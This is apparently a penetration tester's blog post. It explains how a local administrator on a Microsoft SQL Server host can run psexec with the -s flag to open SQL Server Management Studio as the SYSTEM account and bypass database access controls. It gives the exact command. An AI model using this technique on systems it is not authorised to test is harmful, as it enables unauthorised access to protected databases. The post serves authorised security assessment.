While we, as penetration testers, love compromising systems during assessments, we all know the most important portion of a penetration test is actually getting access to critical data and systems. So, post exploitation, I generally head for the database servers. However, depending on the permissions model of the target database, there may still be another hurdle to bypass.
I have come across environments where administrators, even Domain Admins, did not have authentication rights to a Microsoft SQL Server even when logged on locally. One method previously used to gain access to the database at that point would be to try to determine what groups or accounts did have access and add a new account or impersonate an authorized user. I’ve also spent time going searching across file shares and other servers for the raw credentials to perform SQL Server Authentication. While these all work, it eats up valuable time – a resource already in short supply during a penetration test.
While trying to find a better way, I discovered a method that cuts straight to the point and means not having to waste time with the other methods. The NT-AUTHORITY\SYSTEM account actually does have full access to the database server, so we can leverage that. The following steps can be performed after getting a terminal services connection to the MS SQL Server.
- Download the standard psexec.exe binary onto the SQL Server
- Start a privileged command prompt by right-clicking the Command Prompt shortcut and selecting ‘run as administrator’
- Start psexec with the following option:
psexec -s -I “C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\Ssms.exe”
(The -s says to start as SYSTEM and the -I will start the application interactively)
(Note: For SQL Server 2005, the path may be 100 rather than 90.)
After following the steps above, a window like the one below should appear, in which you can select the database to connect to as SYSTEM. At this point you can begin pillaging to your heart’s content. This works for SQL Server 2008 R2 systems and before.
*Thank you to Argenis Fernandez for his article, which provided an invaluable reference on how to perform this.